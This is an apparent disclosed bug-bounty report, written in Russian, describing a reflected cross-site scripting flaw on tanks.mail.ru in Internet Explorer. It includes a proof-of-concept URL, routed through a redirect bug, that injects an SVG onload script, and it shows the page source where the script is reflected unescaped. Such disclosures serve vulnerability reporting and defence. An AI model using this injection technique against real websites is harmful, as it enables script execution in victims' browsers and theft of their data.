Mail.ru: [tanks.mail.ru] Internet Explorer XSS via Request-URI

2015-06-07T16:28:13
ID H1:66423
Type hackerone
Reporter bobrov
Modified 2016-10-06T12:22:36

Description

Открыть с помощью Internet Explorer (для формирования правильного запроса используется баг перенаправления, поэтому необходим сценарий "bf.am/x?r=") http://bf.am/x?r=https://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%252e%252e/%252e%252e/ Результат: <meta property="og:url" content="http://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/" /> ... <div id="shareToolbox" class="b-likes__inner" data-url="http://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/" data-title="Страница не найдена - Ошибка 404